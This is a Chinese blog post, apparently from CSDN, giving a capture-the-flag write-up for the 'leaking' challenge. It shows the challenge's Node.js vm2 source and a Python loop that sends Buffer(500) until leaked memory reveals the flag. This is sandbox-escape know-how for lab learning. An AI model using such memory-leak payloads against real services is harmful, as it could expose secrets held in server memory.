攻防世界 WEB leaking

最新推荐文章于 2022-06-24 16:53:00 发布
最新推荐文章于 2022-06-24 16:53:00 发布
阅读量356 收藏 1
点赞数
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/119908280
版权

这题考的是node.js沙箱逃逸,之前没遇到过,属于是又学到新知识了
具体看这一篇,https://juejin.cn/post/6889226643525599240
简单说一下原理吧,就是理论上沙箱里的代码只能与vm上下文打交道,可是vm上下文确是可以与沙箱外的代码和变量打交道的,因此,如果我们能够构造请求,
使得vm上下文代替我们去读取利用沙箱外的代码和变量的话,那就形成了沙箱逃逸,拿这一题来举个例吧
先看一下代码

"use strict";

var randomstring = require("randomstring");
var express = require("express");
var {
    VM
} = require("vm2");
var fs = require("fs");

var app = express();
var flag = require("./config.js").flag

app.get("/", function(req, res) {
    res.header("Content-Type", "text/plain");

    /*    Orange is so kind so he put the flag here. But if you can guess correctly :P    */
    eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\";")
    if (req.query.data && req.query.data.length <= 12) {
        var vm = new VM({
            timeout: 1000
        });
        console.log(req.query.data);
        res.send("eval ->" + vm.run(req.query.data));
    } else {
        res.send(fs.readFileSync(__filename).toString());
    }
});
app.listen(3000, function() {
    console.log("listening on port 3000!");
});

由于第一个eval把flag读入了在内存中的全局变量
所以只要我们能通过沙箱里的eval去读取内存中的内容的话,就可以形成沙箱逃逸
这题甚至都没有用到什么原型链,直接用Buffer()函数用于读取内存的内容,可以通过这个函数直接去读取全局内存中的内容
由于内存的保护机制,并不是每一次都能读取到含有flag内容的代码的,多运行几次就好了,上脚本

# encoding=utf-8

import requests
import time
import re
url = 'http://111.200.241.244:49433/?data=Buffer(500)'
response = ''
while 'flag' not in response:
        req = requests.get(url)
        response = req.text
        print(req.status_code)
        time.sleep(0.1)
        if 'flag{' in response:
            print(re.findall(r'flag{.+}',response))
            break

参考视频链接:https://www.bilibili.com/video/BV11f4y1n71A/

显哥无敌
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Gradient Inversion Attack Leaking Private Labels in Two-Party Sp
01-03
Gradient Inversion Attack Leaking Private Labels in Two-Party Split Learning_两方分裂学习中泄漏私有标签的梯度反转攻击.pdf
张氏web漏洞检查工具发布-英文名:Mr.Zhang Web Leak Scanner GUI
张人杰的博客
10-03 706
张氏web漏洞检查工具发布( Mr.Zhang Web Leak Scanner GUI ),下载地址:  http://download.csdn.net/detail/ranjio_z/9154293
xctf攻防世界 Web高手进阶区 leaking
l8947943的博客
01-01 1627
1. 进入环境,查看内容,给了一堆代码 看到基本的代码格式,还有其中var { VM } = require(“vm2”);,这是Node.js的代码。其中也给了一句注释: /* Orange is so kind so he put the flag here. But if you can guess correctly :P */ eval("var flag_" + randomstring.generate(64) + " = \"flag{" + flag + "}\"
攻防世界 web高级 leaking
beihai2013
01-18 677
考察:node.js逃逸 参考: https://blog.csdn.net/weixin_44037296/article/details/112387663 https://blog.csdn.net/weixin_46676743/article/details/112669105 不知道咋说,直接抄源码 # encoding=utf-8 import requests import time url = 'http://220.249.52.134:41148/?data=Buffer(500)'
xctf攻防世界Leaking wp
sash1mi
01-15 1676
访问题目地址 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res) { .
攻防世界xctfwebleaking题解
qq_60787987的博客
03-13 5869
11打开网站我们可以看到如下代码: 正在上传… 重新上传 取消
Cisco-Fusion-Router-IOS-XE-route-leaking-guide from yuanshou
最新发布
06-17
Cisco_Fusion_Router_IOS_XE_route-leaking_guide from yuanshou
private-leaking-investigation:用于演示 AngularJS 内存泄漏的示例应用程序
06-18
私人泄密调查 用于演示 AngularJS 内存泄漏的示例应用程序
信息安全_数据安全_asec-t08-leaking-ads-is-user-data-truly-secure.pdf
08-21
信息安全_数据安全_asec-t08-leaking-ads-is-user-data-truly-secure 金融安全 安全研究 安全编码 安全审计 漏洞挖掘
RSA 2018PPT汇总(108份).zip
01-03
the-path-to-successful-detection.pdf', 'asec-t08-leaking-ads-is-user-data-truly-secure.pdf', 'asec-t10-realizing-software-security-maturity-the-growing-pains-and-gains.pdf', 'asec-w04-derived-unique-...
攻防世界 web leaking
Zeker62的博客
09-08 190
https://blog.csdn.net/weixin_46676743/article/details/112669105
攻防世界——leaking
m0_62063669的博客
06-24 275
攻防世界——leaking进入环境,给了一段代码浅谈npm,vm,vm2,Node.js沙盒逃逸这是一题是关于Node.js沙盒逃逸的。其中var { VM } = require(“vm2”);是Node.js 官方安全沙箱的库(是Node.js有关沙盒的代码)低版本的node可以使用buffer()来查看内存,只要调用过的变量,都会存在内存中,那么可以构造paylaod来读取内存 req.query.data.length 的限制可以通过传入数组绕过1.题目通过访问得到了一串代码,这段代码提示在沙箱中.
攻防世界-leaking-(详细操作)做题过程
qq_43715020的博客
06-18 254
攻防世界-leaking-(详细操作)做题过程
攻防世界 web高手进阶区 5分题 leaking
闵行小鱼塘
04-14 608
攻防世界web高手进阶区的5分题,本篇是leaking的writeup
攻防世界Webleaking
Light_inthe_eyes的博客
10-16 121
打开网页,代码审计,通过vm能猜测是关于node.js沙箱逃逸: "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/"
BUUCTF--[HITCON 2016]Leaking
qq_46263951的博客
08-13 248
进入页面后给出代码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.get("/", function(req, res).
BUU刷题记录——5
weixin_43610673的博客
09-21 1396
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
BUUCTF [HITCON 2016] Leaking
Senimo
01-15 766
BUUCTF [HITCON 2016] Leaking 考点: 启动环境: "use strict"; var randomstring = require("randomstring"); var express = require("express"); var { VM } = require("vm2"); var fs = require("fs"); var app = express(); var flag = require("./config.js").flag app.g
[HITCON 2016]Leaking沙箱逃逸学习
Y4tacker的博客
02-23 780
[HITCON 2016]Leaking沙箱逃逸学习 node.js 里提供了 vm 模块,相当于一个虚拟机,可以让你在执行代码时候隔离当前的执行环境,避免被恶意代码攻击。但是这道题比较有意思 考点是: node.js中VM2沙箱逃逸 JS通过Buffer 类处理二进制数据的缓冲区 首先给出了题目的源码 "use strict"; var randomstring = require("randomstring"); var express = require("express"); var {
Leaking Caffe2 thread-pool after fork.
05-23
这个错误通常是由于在主进程中创建了Caffe2线程池,但在子进程中没有正确地清理它所引起的。这可能会导致子进程中的线程池泄漏,从而导致性能下降或其他问题。 要解决此问题,您可以在fork之后立即清理Caffe2线程池...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值